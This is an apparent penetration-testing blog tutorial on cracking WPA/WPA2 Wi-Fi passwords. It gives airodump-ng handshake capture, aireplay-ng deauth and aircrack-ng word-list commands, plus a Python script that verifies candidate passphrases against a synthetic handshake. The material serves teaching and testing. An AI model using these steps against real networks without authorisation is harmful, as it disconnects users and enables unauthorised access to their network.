Network Penetration Testing — Gaining Access — 2

Tanishq Sachin Shah
4 min read · Aug 11, 2021


In this blog, we will learn how to recover the pre-shared key of a WPA/WPA2 network using a single method: capture the 4-way handshake, then run a word-list attack against it.

2. WPA/WPA2 (Wi-Fi Protected Access) -

All of the back-doors / weaknesses found in WEP have been fixed in this encryption, which makes it much harder to break. Here every packet is encrypted with a unique temporary (per-packet) key, so even if we managed to recover one of those temporary keys and decrypt its packet, what we would get contains nothing that leads back to the network's pre-shared key.

To break this encryption, we must use a word-list attack, often loosely called a brute-force attack. To perform that attack we first need to capture a handshake, which is exchanged whenever a device connects to the access point. No worries if nobody is connecting right now: we can force a handshake by performing a deauth attack on an existing user. This attack disconnects the user for about a second, which the user will hardly notice, and when the device reconnects we capture the handshake. The handshake does not contain the key, and nothing in it lets us extract the key directly, but it can be used to check whether a candidate key is the valid one.

Now it’s time to switch on the beast ( Kali Linux ) , as is traditional…..

Put your WiFi adapter in monitor mode as well.
If you don’t know how to do so, I recommend reading my earlier blog first.

First, we must run airodump-ng in order to capture the handshake — airodump-ng --bssid (router's MAC address) --channel (channel no.) --write wpa_handshake wlan0

The router’s MAC address goes in --bssid and the channel number in --channel. We can get both by first running airodump-ng wlan0. airodump-ng appends a counter to the file name, so the capture ends up in wpa_handshake-01.cap. Now, for the handshake to land in the capture, a device has to connect to the target while the first command is running. We use the deauth command to force this: aireplay-ng --deauth 4 -a (MAC address of router) -c (MAC address of target device) wlan0. aireplay-ng quickly kicks the user off the network; when the device reconnects on its own, we capture the handshake, which will later let us check whether a candidate key is valid or not. Here --deauth 4 is the number of deauth bursts to send, not a duration: a small number is enough to force a reconnect, while 0 sends deauths without stopping and keeps the user from reconnecting at all. You know the handshake is in the capture when airodump-ng shows "WPA handshake:" followed by the router’s MAC address in its top right corner.

Now that we’ve captured the handshake, we can run the word-list attack. To do so, we’ll need a word-list, which you can download from the web or build yourself with a tool like cupp. For now, we’ll use the default word-list shipped with Kali Linux, rockyou.txt, located in /usr/share/wordlists. On a fresh install it is still compressed as rockyou.txt.gz, so unpack it first with gzip -d /usr/share/wordlists/rockyou.txt.gz.

Now we’re ready for the last step. To run the attack, we use aircrack-ng. The command is as follows: aircrack-ng wpa_handshake-01.cap -w (word-list). If the capture file contains more than one network, add -b (router’s MAC address) so aircrack-ng picks the right one.

Give the path of the word-list in -w (for example /usr/share/wordlists/rockyou.txt), or make sure the file sits in the directory you run the command from, and then run it. If aircrack-ng complains that the capture holds no valid handshake, go back and repeat the deauth step. If the word-list is huge it will take some time, and if it does not contain the password, try a different word-list.
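What aircrack-ng actually does with that handshake, as an added example that is not part of the original post: for every word in the list it derives the PMK and PTK, recomputes the MIC of the client’s EAPOL message 2 with the derived KCK, and compares it with the MIC that was captured. Nothing in the handshake yields the key; it only confirms a guess. The SSID, MAC addresses, nonces and passphrase below are constructed for illustration, and the handshake is synthesised inside the script rather than parsed from a .cap file. It goes slightly beyond the post by handling both WPA (HMAC-MD5) and WPA2 (HMAC-SHA1-128) MICs.

```python
"""Offline check of a WPA/WPA2-PSK 4-way handshake against candidate passphrases.

Per candidate: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes),
PTK = PRF-512(PMK, MACs, nonces), KCK = PTK[:16], then recompute the MIC of the
captured EAPOL-Key frame and compare it with the MIC the client sent.
"""
import hashlib
import hmac
import struct

# EAPOL-Key frame layout: 4-byte 802.1X header, then descriptor type(1) key info(2)
# key length(2) replay counter(8) nonce(32) IV(16) RSC(8) key ID(8) MIC(16)
# key data length(2) key data. The MIC therefore starts at byte 81 of the frame.
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK from passphrase and SSID (PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 over "Pairwise key expansion" || min(MACs)||max(MACs)||min(nonces)||max(nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20-byte HMAC-SHA1 outputs cover the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, key_descriptor_version: int) -> bytes:
    """MIC over the frame with its MIC field zeroed: HMAC-MD5 (v1, WPA/TKIP) or HMAC-SHA1-128 (v2, WPA2/CCMP)."""
    if key_descriptor_version not in (1, 2):
        raise ValueError("only key descriptor versions 1 and 2 are handled here (v3 uses AES-128-CMAC)")
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if key_descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def check_passphrase(hs: dict, candidate: str) -> bool:
    """True if `candidate` reproduces the MIC the client sent in handshake message 2."""
    pmk = derive_pmk(candidate, hs["ssid"])
    ptk = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"], hs["version"]), captured_mic)


def wordlist_attack(hs: dict, wordlist):
    """Return the first candidate that verifies, or None. Entries that cannot be WPA passphrases are skipped."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not 8 <= len(word) <= 63:  # WPA-PSK passphrases are 8 to 63 characters
            continue
        if check_passphrase(hs, word):
            return word
    return None


def build_eapol_msg2(snonce: bytes, key_info: int, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (constructed for this example, not a real capture)."""
    body = struct.pack(">BHHQ", 2, key_info, 0, 1)             # RSN descriptor, key info, key length, replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # SNonce, key IV, key RSC, key ID
    body += mic + struct.pack(">H", 0)                         # MIC, key data length (no key data)
    return struct.pack(">BBH", 2, 3, len(body)) + body         # 802.1X version 2, type EAPOL-Key, body length


def constructed_handshake(true_passphrase: str, version: int = 2) -> dict:
    """Synthetic handshake for a hypothetical network; its MIC is computed from `true_passphrase`."""
    hs = {
        "ssid": "CorpGuest",                        # hypothetical SSID
        "ap_mac": bytes.fromhex("001122334455"),    # hypothetical router MAC
        "sta_mac": bytes.fromhex("66778899aabb"),   # hypothetical client MAC
        "anonce": bytes(range(32)),                 # fixed nonces stand in for the random ones
        "snonce": bytes(range(32, 64)),
        "version": version,
    }
    key_info = 0x010A if version == 2 else 0x0109   # pairwise + MIC bits, descriptor version 2 or 1
    unsigned = build_eapol_msg2(hs["snonce"], key_info)
    kck = derive_ptk(derive_pmk(true_passphrase, hs["ssid"]), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])[:16]
    hs["eapol"] = build_eapol_msg2(hs["snonce"], key_info, eapol_mic(kck, unsigned, version))
    return hs


if __name__ == "__main__":
    capture = constructed_handshake("correcthorse")   # hypothetical passphrase
    candidates = ["password", "12345678", "short", "correcthorse", "letmein123"]
    print("KEY FOUND:", wordlist_attack(capture, candidates))
```

Each candidate costs 4096 HMAC-SHA1 rounds for the PMK alone, which is what makes the attack slow on a large list and hopeless against a long random passphrase: the handshake confirms a guess, it never hands over the key.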

Now, if you don’t want to be a part of this attack and want to safeguard yourself and your router, read this: https://tanishqshahsays.wordpress.com/2020/12/10/how-to-secure-wi-fi/

The commands we used -

  • ifconfig wlan0 down
  • airmon-ng check kill
  • iwconfig wlan0 mode monitor
  • ifconfig wlan0 up
  • airodump-ng wlan0
  • airodump-ng --bssid (router's MAC address) --channel (channel no.) --write wpa_handshake wlan0
  • aireplay-ng --deauth 4 -a (MAC address of router) -c (MAC address of target device) wlan0
  • aircrack-ng wpa_handshake-01.cap -w (wordlist)

Brain Tattoo:-

  • All the back-doors of WEP are closed in WPA/WPA2.
  • To break into a WPA/WPA2 network we have to perform a word-list/brute-force attack.
  • We can’t break into the network just by capturing packets.
  • The handshake is captured when a device connects to the network; to force that we use a deauth attack.
  • Using the captured handshake we can check whether a candidate password is valid or not.

DISCLAIMER: This blog does NOT promote or encourage any illegal activities. All content provided by this blog is meant for EDUCATIONAL and informational PURPOSES only. We will not be responsible for any illegal actions you take.


Written by Tanishq Sachin Shah

Triage Analyst @HackerOne | Blogger | Penetration Tester | Red Team | Skating Coach
